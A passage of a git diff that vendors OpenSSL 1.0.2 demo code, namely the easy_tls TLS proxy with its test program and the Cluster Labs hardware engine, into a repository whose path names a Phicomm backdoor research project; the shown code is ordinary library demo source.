+{
+    int n, r;
+
+    DEBUG_MSG("write_attempt");
+    n = write(fd, buf->buf + buf->offset, buf->len);
+    DEBUG_MSG2("write", n);
+    r = get_error(n, select, closed, progress);
+    if (n > 0) {
+        buf->len -= n;
+        assert(buf->len >= 0);
+        if (buf->len == 0)
+            buf->offset = 0;
+        else
+            buf->offset += n;
+    }
+    if (r == -1)
+        tls_errprintf(1, tls_child_apparg, "write error: %s\n",
+                      strerror(errno));
+    return r;
+}
+
+static int
+read_attempt(int fd, struct tunnelbuf *buf, int *select, int *closed,
+             int *progress)
+{
+    int n, r;
+    size_t total;
+
+    DEBUG_MSG("read_attempt");
+    total = buf->offset + buf->len;
+    assert(total < sizeof buf->buf);
+    n = read(fd, buf->buf + total, (sizeof buf->buf) - total);
+    DEBUG_MSG2("read", n);
+    r = get_error(n, select, closed, progress);
+    if (n > 0) {
+        buf->len += n;
+        assert(buf->offset + buf->len <= sizeof buf->buf);
+    }
+    if (r == -1)
+        tls_errprintf(1, tls_child_apparg, "read error: %s\n",
+                      strerror(errno));
+    return r;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/easy-tls.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/easy-tls.h
new file mode 100644
index 0000000..1c587b8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/easy-tls.h
@@ -0,0 +1,60 @@
+/* -*- Mode: C; c-file-style: "bsd" -*- */
+/*-
+ * easy-tls.h -- generic TLS proxy.
+ * $Id: easy-tls.h,v 1.1 2001/09/17 19:06:59 bodo Exp $
+ */
+/*
+ * (c) Copyright 1999 Bodo Moeller.  All rights reserved.
+ */
+
+#ifndef HEADER_TLS_H
+# define HEADER_TLS_H
+
+# ifndef HEADER_SSL_H
+typedef struct ssl_ctx_st SSL_CTX;
+# endif
+
+# define TLS_INFO_SIZE 512      /* max. # of bytes written to infofd */
+
+void tls_set_dhe1024(int i, void *apparg);
+/*
+ * Generate DHE parameters: i >= 0 deterministic (i selects seed), i < 0
+ * random (may take a while). tls_create_ctx calls this with random
+ * non-negative i if the application has never called it.
+ */
+
+void tls_rand_seed(void);
+int tls_rand_seed_from_file(const char *filename, size_t n, void *apparg);
+void tls_rand_seed_from_memory(const void *buf, size_t n);
+
+struct tls_create_ctx_args {
+    int client_p;
+    const char *certificate_file;
+    const char *key_file;
+    const char *ca_file;
+    int verify_depth;
+    int fail_unless_verified;
+    int export_p;
+};
+struct tls_create_ctx_args tls_create_ctx_defaultargs(void);
+/*
+ * struct tls_create_ctx_args is similar to a conventional argument list, but
+ * it can provide default values and allows for future extension.
+ */
+SSL_CTX *tls_create_ctx(struct tls_create_ctx_args, void *apparg);
+
+struct tls_start_proxy_args {
+    int fd;
+    int client_p;
+    SSL_CTX *ctx;
+    pid_t *pid;
+    int *infofd;
+};
+struct tls_start_proxy_args tls_start_proxy_defaultargs(void);
+/*
+ * tls_start_proxy return value *MUST* be checked! 0 means ok, otherwise
+ * we've probably run out of some resources.
+ */
+int tls_start_proxy(struct tls_start_proxy_args, void *apparg);
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/test.c
new file mode 100644
index 0000000..d1dd53d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/test.c
@@ -0,0 +1,248 @@
+/* test.c */
+/* $Id: test.c,v 1.1 2001/09/17 19:06:59 bodo Exp $ */
+
+#define L_PORT 9999
+#define C_PORT 443
+
+#include <arpa/inet.h>
+#include <assert.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <netinet/in.h>
+#include <netinet/tcp.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/select.h>
+#include <sys/socket.h>
+#include <unistd.h>
+
+#include "test.h"
+#include "easy-tls.h"
+
+void test_process_init(int fd, int client_p, void *apparg)
+{
+    fprintf(stderr,
+            "test_process_init(fd = %d, client_p = %d, apparg = %p)\n", fd,
+            client_p, apparg);
+}
+
+void test_errflush(int child_p, char *errbuf, size_t num, void *apparg)
+{
+    fputs(errbuf, stderr);
+}
+
+int main(int argc, char *argv[])
+{
+    int s, fd, r;
+    FILE *conn_in;
+    FILE *conn_out;
+    char buf[256];
+    SSL_CTX *ctx;
+    int client_p = 0;
+    int port;
+    int tls = 0;
+    char infobuf[TLS_INFO_SIZE + 1];
+
+    if (argc > 1 && argv[1][0] == '-') {
+        fputs("Usage: test [port]                   -- server\n"
+              "       test num.num.num.num [port]   -- client\n", stderr);
+        exit(1);
+    }
+
+    if (argc > 1) {
+        if (strchr(argv[1], '.')) {
+            client_p = 1;
+        }
+    }
+
+    fputs(client_p ? "Client\n" : "Server\n", stderr);
+
+    {
+        struct tls_create_ctx_args a = tls_create_ctx_defaultargs();
+        a.client_p = client_p;
+        a.certificate_file = "cert.pem";
+        a.key_file = "cert.pem";
+        a.ca_file = "cacerts.pem";
+
+        ctx = tls_create_ctx(a, NULL);
+        if (ctx == NULL)
+            exit(1);
+    }
+
+    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (s == -1) {
+        perror("socket");
+        exit(1);
+    }
+
+    if (client_p) {
+        struct sockaddr_in addr;
+        size_t addr_len = sizeof addr;
+
+        addr.sin_family = AF_INET;
+        assert(argc > 1);
+        if (argc > 2)
+            sscanf(argv[2], "%d", &port);
+        else
+            port = C_PORT;
+        addr.sin_port = htons(port);
+        addr.sin_addr.s_addr = inet_addr(argv[1]);
+
+        r = connect(s, &addr, addr_len);
+        if (r != 0) {
+            perror("connect");
+            exit(1);
+        }
+        fd = s;
+        fprintf(stderr, "Connect (fd = %d).\n", fd);
+    } else {
+        /* server */
+        {
+            int i = 1;
+
+            r = setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (void *)&i, sizeof i);
+            if (r == -1) {
+                perror("setsockopt");
+                exit(1);
+            }
+        }
+
+        {
+            struct sockaddr_in addr;
+            size_t addr_len = sizeof addr;
+
+            if (argc > 1)
+                sscanf(argv[1], "%d", &port);
+            else
+                port = L_PORT;
+            addr.sin_family = AF_INET;
+            addr.sin_port = htons(port);
+            addr.sin_addr.s_addr = INADDR_ANY;
+
+            r = bind(s, &addr, addr_len);
+            if (r != 0) {
+                perror("bind");
+                exit(1);
+            }
+        }
+
+        r = listen(s, 1);
+        if (r == -1) {
+            perror("listen");
+            exit(1);
+        }
+
+        fprintf(stderr, "Listening at port %i.\n", port);
+
+        fd = accept(s, NULL, 0);
+        if (fd == -1) {
+            perror("accept");
+            exit(1);
+        }
+
+        fprintf(stderr, "Accept (fd = %d).\n", fd);
+    }
+
+    conn_in = fdopen(fd, "r");
+    if (conn_in == NULL) {
+        perror("fdopen");
+        exit(1);
+    }
+    conn_out = fdopen(fd, "w");
+    if (conn_out == NULL) {
+        perror("fdopen");
+        exit(1);
+    }
+
+    setvbuf(conn_in, NULL, _IOLBF, 256);
+    setvbuf(conn_out, NULL, _IOLBF, 256);
+
+    while (fgets(buf, sizeof buf, stdin) != NULL) {
+        if (buf[0] == 'W') {
+            fprintf(conn_out, "%.*s\r\n", (int)(strlen(buf + 1) - 1),
+                    buf + 1);
+            fprintf(stderr, ">>> %.*s\n", (int)(strlen(buf + 1) - 1),
+                    buf + 1);
+        } else if (buf[0] == 'C') {
+            fprintf(stderr, "Closing.\n");
+            fclose(conn_in);
+            fclose(conn_out);
+            exit(0);
+        } else if (buf[0] == 'R') {
+            int lines = 0;
+
+            sscanf(buf + 1, "%d", &lines);
+            do {
+                if (fgets(buf, sizeof buf, conn_in) == NULL) {
+                    if (ferror(conn_in)) {
+                        fprintf(stderr, "ERROR\n");
+                        exit(1);
+                    }
+                    fprintf(stderr, "CLOSED\n");
+                    return 0;
+                }
+                fprintf(stderr, "<<< %s", buf);
+            } while (--lines > 0);
+        } else if (buf[0] == 'T') {
+            int infofd;
+
+            tls++;
+            {
+                struct tls_start_proxy_args a = tls_start_proxy_defaultargs();
+                a.fd = fd;
+                a.client_p = client_p;
+                a.ctx = ctx;
+                a.infofd = &infofd;
+                r = tls_start_proxy(a, NULL);
+            }
+            assert(r != 1);
+            if (r != 0) {
+                fprintf(stderr, "tls_start_proxy failed: %d\n", r);
+                switch (r) {
+                case -1:
+                    fputs("socketpair", stderr);
+                    break;
+                case 2:
+                    fputs("FD_SETSIZE exceeded", stderr);
+                    break;
+                case -3:
+                    fputs("pipe", stderr);
+                    break;
+                case -4:
+                    fputs("fork", stderr);
+                    break;
+                case -5:
+                    fputs("dup2", stderr);
+                    break;
+                default:
+                    fputs("?", stderr);
+                }
+                if (r < 0)
+                    perror("");
+                else
+                    fputc('\n', stderr);
+                exit(1);
+            }
+
+            r = read(infofd, infobuf, sizeof infobuf - 1);
+            if (r > 0) {
+                const char *info = infobuf;
+                const char *eol;
+
+                infobuf[r] = '\0';
+                while ((eol = strchr(info, '\n')) != NULL) {
+                    fprintf(stderr, "+++ `%.*s'\n", eol - info, info);
+                    info = eol + 1;
+                }
+                close(infofd);
+            }
+        } else {
+            fprintf(stderr, "W...  write line to network\n"
+                    "R[n]  read line (n lines) from network\n"
+                    "C     close\n"
+                    "T     start %sTLS proxy\n", tls ? "another " : "");
+        }
+    }
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/test.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/test.h
new file mode 100644
index 0000000..a7d0130
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/test.h
@@ -0,0 +1,10 @@
+/* test.h */
+/* $Id: test.h,v 1.1 2001/09/17 19:07:00 bodo Exp $ */
+
+void test_process_init(int fd, int client_p, void *apparg);
+#define TLS_APP_PROCESS_INIT test_process_init
+
+#undef TLS_CUMULATE_ERRORS
+
+void test_errflush(int child_p, char *errbuf, size_t num, void *apparg);
+#define TLS_APP_ERRFLUSH test_errflush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/Makefile
new file mode 100644
index 0000000..956193f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/Makefile
@@ -0,0 +1,114 @@
+LIBNAME=	libclabs
+SRC=		hw_cluster_labs.c
+OBJ=		hw_cluster_labs.o
+HEADER=		hw_cluster_labs.h
+
+CC=		gcc
+PIC=		-fPIC
+CFLAGS=		-g -I../../../include $(PIC) -DENGINE_DYNAMIC_SUPPORT -DFLAT_INC
+AR=		ar r
+RANLIB=		ranlib
+
+LIB=		$(LIBNAME).a
+SHLIB=		$(LIBNAME).so
+
+all:
+		@echo 'Please choose a system to build on:'
+		@echo ''
+		@echo 'tru64:    Tru64 Unix, Digital Unix, Digital OSF/1'
+		@echo 'solaris:  Solaris'
+		@echo 'irix:     IRIX'
+		@echo 'hpux32:   32-bit HP/UX'
+		@echo 'hpux64:   64-bit HP/UX'
+		@echo 'aix:      AIX'
+		@echo 'gnu:      Generic GNU-based system (gcc and GNU ld)'
+		@echo ''
+
+FORCE.update:
+update:		FORCE.update
+		perl ../../../util/mkerr.pl -conf hw_cluster_labs.ec \
+			-nostatic -staticloader -write hw_cluster_labs.c
+
+gnu:		$(SHLIB).gnu
+tru64:		$(SHLIB).tru64
+solaris:	$(SHLIB).solaris
+irix:		$(SHLIB).irix
+hpux32:		$(SHLIB).hpux32
+hpux64:		$(SHLIB).hpux64
+aix:		$(SHLIB).aix
+
+$(LIB):		$(OBJ)
+		$(AR) $(LIB) $(OBJ)
+		- $(RANLIB) $(LIB)
+
+LINK_SO=	\
+  ld -r -o $(LIBNAME).o $$ALLSYMSFLAGS $(LIB) && \
+  (nm -Pg $(LIBNAME).o | grep ' [BDT] ' | cut -f1 -d' ' > $(LIBNAME).exp; \
+   $$SHAREDCMD $$SHAREDFLAGS -o $(SHLIB) $(LIBNAME).o -L ../../.. -lcrypto -lc)
+
+$(SHLIB).gnu:	$(LIB)
+		ALLSYMSFLAGS='--whole-archive' \
+		SHAREDFLAGS='-shared -Wl,-soname=$(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).gnu
+$(SHLIB).tru64:	$(LIB)
+		ALLSYMSFLAGS='-all' \
+		SHAREDFLAGS='-shared' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).tru64
+$(SHLIB).solaris:	$(LIB)
+		ALLSYMSFLAGS='-z allextract' \
+		SHAREDFLAGS='-G -h $(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).solaris
+$(SHLIB).irix:	$(LIB)
+		ALLSYMSFLAGS='-all' \
+		SHAREDFLAGS='-shared -Wl,-soname,$(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).irix
+$(SHLIB).hpux32:	$(LIB)
+		ALLSYMSFLAGS='-Fl' \
+		SHAREDFLAGS='+vnocompatwarnings -b -z +s +h $(SHLIB)' \
+		SHAREDCMD='/usr/ccs/bin/ld'; \
+		$(LINK_SO)
+		touch $(SHLIB).hpux32
+$(SHLIB).hpux64:	$(LIB)
+		ALLSYMSFLAGS='+forceload' \
+		SHAREDFLAGS='-b -z +h $(SHLIB)' \
+		SHAREDCMD='/usr/ccs/bin/ld'; \
+		$(LINK_SO)
+		touch $(SHLIB).hpux64
+$(SHLIB).aix:	$(LIB)
+		ALLSYMSFLAGS='-bnogc' \
+		SHAREDFLAGS='-G -bE:$(LIBNAME).exp -bM:SRE' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).aix
+
+depend:
+		sed -e '/^# DO NOT DELETE.*/,$$d' < Makefile > Makefile.tmp
+		echo '# DO NOT DELETE THIS LINE -- make depend depends on it.' >> Makefile.tmp
+		gcc -M $(CFLAGS) $(SRC) >> Makefile.tmp
+		perl ../../../util/clean-depend.pl < Makefile.tmp > Makefile.new
+		rm -f Makefile.tmp Makefile
+		mv Makefile.new Makefile
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rsaref.o: ../../../include/openssl/asn1.h ../../../include/openssl/bio.h
+rsaref.o: ../../../include/openssl/bn.h ../../../include/openssl/crypto.h
+rsaref.o: ../../../include/openssl/dh.h ../../../include/openssl/dsa.h
+rsaref.o: ../../../include/openssl/e_os2.h ../../../include/openssl/engine.h
+rsaref.o: ../../../include/openssl/err.h ../../../include/openssl/lhash.h
+rsaref.o: ../../../include/openssl/opensslconf.h
+rsaref.o: ../../../include/openssl/opensslv.h
+rsaref.o: ../../../include/openssl/ossl_typ.h ../../../include/openssl/rand.h
+rsaref.o: ../../../include/openssl/rsa.h ../../../include/openssl/safestack.h
+rsaref.o: ../../../include/openssl/stack.h ../../../include/openssl/symhacks.h
+rsaref.o: ../../../include/openssl/ui.h rsaref.c rsaref_err.c rsaref_err.h
+rsaref.o: source/des.h source/global.h source/md2.h source/md5.h source/rsa.h
+rsaref.o: source/rsaref.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/cluster_labs.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/cluster_labs.h
new file mode 100644
index 0000000..d024d91
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/cluster_labs.h
@@ -0,0 +1,33 @@
+typedef int cl_engine_init(void);
+typedef int cl_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                       const BIGNUM *m, BN_CTX *cgx);
+typedef int cl_mod_exp_crt(BIGNUM *r, BIGNUM *a, const BIGNUM *p,
+                           const BIGNUM *q, const BIGNUM *dmp1,
+                           const BIGNUM *dmq1, const BIGNUM *iqmp,
+                           BN_CTX *ctx);
+typedef int cl_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa);
+typedef int cl_rsa_pub_enc(int flen, const unsigned char *from,
+                           unsigned char *to, RSA *rsa, int padding);
+typedef int cl_rsa_pub_dec(int flen, const unsigned char *from,
+                           unsigned char *to, RSA *rsa, int padding);
+typedef int cl_rsa_priv_enc(int flen, const unsigned char *from,
+                            unsigned char *to, RSA *rsa, int padding);
+typedef int cl_rsa_priv_dec(int flen, const unsigned char *from,
+                            unsigned char *to, RSA *rsa, int padding);
+typedef int cl_rand_bytes(unsigned char *buf, int num);
+typedef DSA_SIG *cl_dsa_sign(const unsigned char *dgst, int dlen, DSA *dsa);
+typedef int cl_dsa_verify(const unsigned char *dgst, int dgst_len,
+                          DSA_SIG *sig, DSA *dsa);
+
+static const char *CLUSTER_LABS_LIB_NAME = "cluster_labs";
+static const char *CLUSTER_LABS_F1 = "hw_engine_init";
+static const char *CLUSTER_LABS_F2 = "hw_mod_exp";
+static const char *CLUSTER_LABS_F3 = "hw_mod_exp_crt";
+static const char *CLUSTER_LABS_F4 = "hw_rsa_mod_exp";
+static const char *CLUSTER_LABS_F5 = "hw_rsa_priv_enc";
+static const char *CLUSTER_LABS_F6 = "hw_rsa_priv_dec";
+static const char *CLUSTER_LABS_F7 = "hw_rsa_pub_enc";
+static const char *CLUSTER_LABS_F8 = "hw_rsa_pub_dec";
+static const char *CLUSTER_LABS_F20 = "hw_rand_bytes";
+static const char *CLUSTER_LABS_F30 = "hw_dsa_sign";
+static const char *CLUSTER_LABS_F31 = "hw_dsa_verify";
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs.c
new file mode 100644
index 0000000..c58e548
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs.c
@@ -0,0 +1,692 @@
+/* crypto/engine/hw_cluster_labs.c */
+/*
+ * Written by Jan Tschirschwitz (jan.tschirschwitz@cluster-labs.com for the
+ * OpenSSL project 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#define MSC_VER                 /* only used cryptic.h */
+
+#include <stdio.h>
+#include <openssl/crypto.h>
+#include <openssl/dso.h>
+#include <openssl/des.h>
+#include <openssl/engine.h>
+
+#ifndef NO_HW
+# ifndef NO_HW_CLUSTER_LABS
+
+#  ifdef FLAT_INC
+#   include "cluster_labs.h"
+#  else
+#   include "vendor_defns/cluster_labs.h"
+#  endif
+
+#  define CL_LIB_NAME "cluster_labs engine"
+#  include "hw_cluster_labs_err.c"
+
+static int cluster_labs_destroy(ENGINE *e);
+static int cluster_labs_init(ENGINE *e);
+static int cluster_labs_finish(ENGINE *e);
+static int cluster_labs_ctrl(ENGINE *e, int cmd, long i, void *p,
+                             void (*f) ());
+
+/* BIGNUM stuff */
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int cluster_labs_mod_exp_mont(BIGNUM *r, const BIGNUM *a,
+                                     const BIGNUM *p, const BIGNUM *m,
+                                     BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+
+/* RSA stuff */
+#  ifndef OPENSSL_NO_RSA
+static int cluster_labs_rsa_pub_enc(int flen, const unsigned char *from,
+                                    unsigned char *to, RSA *rsa, int padding);
+static int cluster_labs_rsa_pub_dec(int flen, const unsigned char *from,
+                                    unsigned char *to, RSA *rsa, int padding);
+static int cluster_labs_rsa_priv_enc(int flen, const unsigned char *from,
+                                     unsigned char *to, RSA *rsa,
+                                     int padding);
+static int cluster_labs_rsa_priv_dec(int flen, const unsigned char *from,
+                                     unsigned char *to, RSA *rsa,
+                                     int padding);
+static int cluster_labs_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa);
+#  endif
+
+/* DSA stuff */
+#  ifndef OPENSSL_NO_DSA
+static DSA_SIG *cluster_labs_dsa_sign(const unsigned char *dgst, int dlen,
+                                      DSA *dsa);
+static int cluster_labs_dsa_verify(const unsigned char *dgst, int dgst_len,
+                                   DSA_SIG *sig, DSA *dsa);
+static int cluster_labs_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                                    BIGNUM *p1, BIGNUM *a2, BIGNUM *p2,
+                                    BIGNUM *m, BN_CTX *ctx,
+                                    BN_MONT_CTX *in_mont);
+static int cluster_labs_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                                    const BIGNUM *p, const BIGNUM *m,
+                                    BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+#  endif
+
+/* DH stuff */
+#  ifndef OPENSSL_NO_DH
+/* This function is alised to mod_exp (with the DH and mont dropped). */
+static int cluster_labs_mod_exp_dh(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                                   const BIGNUM *p, const BIGNUM *m,
+                                   BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+#  endif
+
+/* RANDOM stuff */
+static int cluster_labs_rand_bytes(unsigned char *buf, int num);
+
+/* The definitions for control commands specific to this engine */
+#  define CLUSTER_LABS_CMD_SO_PATH                ENGINE_CMD_BASE
+static const ENGINE_CMD_DEFN cluster_labs_cmd_defns[] = {
+    {CLUSTER_LABS_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the 'cluster labs' shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {0, NULL, NULL, 0}
+};
+
+/* Our internal RSA_METHOD that we provide pointers to */
+#  ifndef OPENSSL_NO_RSA
+static RSA_METHOD cluster_labs_rsa = {
+    "Cluster Labs RSA method",
+    cluster_labs_rsa_pub_enc,   /* rsa_pub_enc */
+    cluster_labs_rsa_pub_dec,   /* rsa_pub_dec */
+    cluster_labs_rsa_priv_enc,  /* rsa_priv_enc */
+    cluster_labs_rsa_priv_dec,  /* rsa_priv_dec */
+    cluster_labs_rsa_mod_exp,   /* rsa_mod_exp */
+    cluster_labs_mod_exp_mont,  /* bn_mod_exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL,                       /* apps_data */
+    NULL,                       /* rsa_sign */
+    NULL                        /* rsa_verify */
+};
+#  endif
+
+/* Our internal DSA_METHOD that we provide pointers to */
+#  ifndef OPENSSL_NO_DSA
+static DSA_METHOD cluster_labs_dsa = {
+    "Cluster Labs DSA method",
+    cluster_labs_dsa_sign,      /* dsa_do_sign */
+    NULL,                       /* dsa_sign_setup */
+    cluster_labs_dsa_verify,    /* dsa_do_verify */
+    cluster_labs_dsa_mod_exp,   /* dsa_mod_exp */
+    cluster_labs_mod_exp_dsa,   /* bn_mod_exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL                        /* app_data */
+};
+#  endif
+
+/* Our internal DH_METHOD that we provide pointers to */
+#  ifndef OPENSSL_NO_DH
+static DH_METHOD cluster_labs_dh = {
+    "Cluster Labs DH method",
+    NULL,                       /* generate key */
+    NULL,                       /* compute key */
+    cluster_labs_mod_exp_dh,    /* bn_mod_exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL                        /* app_data */
+};
+#  endif
+
+static RAND_METHOD cluster_labs_rand = {
+    /* "Cluster Labs RAND method", */
+    NULL,                       /* seed */
+    cluster_labs_rand_bytes,    /* bytes */
+    NULL,                       /* cleanup */
+    NULL,                       /* add */
+    cluster_labs_rand_bytes,    /* pseudorand */
+    NULL,                       /* status */
+};
+
+static const char *engine_cluster_labs_id = "cluster_labs";
+static const char *engine_cluster_labs_name =
+    "Cluster Labs hardware engine support";
+
+/* engine implementation */
+/* ---------------------*/
+static int bind_helper(ENGINE *e)
+{
+
+    if (!ENGINE_set_id(e, engine_cluster_labs_id) ||
+        !ENGINE_set_name(e, engine_cluster_labs_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &cluster_labs_rsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DSA
+        !ENGINE_set_DSA(e, &cluster_labs_dsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DH
+        !ENGINE_set_DH(e, &cluster_labs_dh) ||
+#  endif
+        !ENGINE_set_RAND(e, &cluster_labs_rand) ||
+        !ENGINE_set_destroy_function(e, cluster_labs_destroy) ||
+        !ENGINE_set_init_function(e, cluster_labs_init) ||
+        !ENGINE_set_finish_function(e, cluster_labs_finish) ||
+        !ENGINE_set_ctrl_function(e, cluster_labs_ctrl) ||
+        !ENGINE_set_cmd_defns(e, cluster_labs_cmd_defns))
+        return 0;
+    /* Ensure the error handling is set up */
+    ERR_load_CL_strings();
+    return 1;
+}
+
+#  ifndef ENGINE_DYNAMIC_SUPPORT
+static ENGINE *engine_cluster_labs(void)
+{
+    ENGINE *ret = ENGINE_new();
+
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+#   ifdef ENGINE_DYNAMIC_SUPPORT
+static
+#   endif
+void ENGINE_load_cluster_labs(void)
+{
+
+    ENGINE *cluster_labs = engine_cluster_labs();
+
+    if (!cluster_labs)
+        return;
+    ENGINE_add(cluster_labs);
+    ENGINE_free(cluster_labs);
+    ERR_clear_error();
+}
+#  endif                        /* !ENGINE_DYNAMIC_SUPPORT */
+
+static int cluster_labs_destroy(ENGINE *e)
+{
+
+    ERR_unload_CL_strings();
+    return 1;
+}
+
+/*
+ * This is a process-global DSO handle used for loading and unloading the
+ * Cluster Labs library. NB: This is only set (or unset) during an init() or
+ * finish() call (reference counts permitting) and they're operating with
+ * global locks, so this should be thread-safe implicitly.
+ */
+static DSO *cluster_labs_dso = NULL;
+
+/*
+ * These are the function pointers that are (un)set when the library has
+ * successfully (un)loaded.
+ */
+static cl_engine_init *p_cl_engine_init = NULL;
+static cl_mod_exp *p_cl_mod_exp = NULL;
+static cl_mod_exp_crt *p_cl_mod_exp_crt = NULL;
+static cl_rsa_mod_exp *p_cl_rsa_mod_exp = NULL;
+static cl_rsa_priv_enc *p_cl_rsa_priv_enc = NULL;
+static cl_rsa_priv_dec *p_cl_rsa_priv_dec = NULL;
+static cl_rsa_pub_enc *p_cl_rsa_pub_enc = NULL;
+static cl_rsa_pub_dec *p_cl_rsa_pub_dec = NULL;
+static cl_rand_bytes *p_cl_rand_bytes = NULL;
+static cl_dsa_sign *p_cl_dsa_sign = NULL;
+static cl_dsa_verify *p_cl_dsa_verify = NULL;
+
+int cluster_labs_init(ENGINE *e)
+{
+
+    cl_engine_init *p1;
+    cl_mod_exp *p2;
+    cl_mod_exp_crt *p3;
+    cl_rsa_mod_exp *p4;
+    cl_rsa_priv_enc *p5;
+    cl_rsa_priv_dec *p6;
+    cl_rsa_pub_enc *p7;
+    cl_rsa_pub_dec *p8;
+    cl_rand_bytes *p20;
+    cl_dsa_sign *p30;
+    cl_dsa_verify *p31;
+
+    /* engine already loaded */
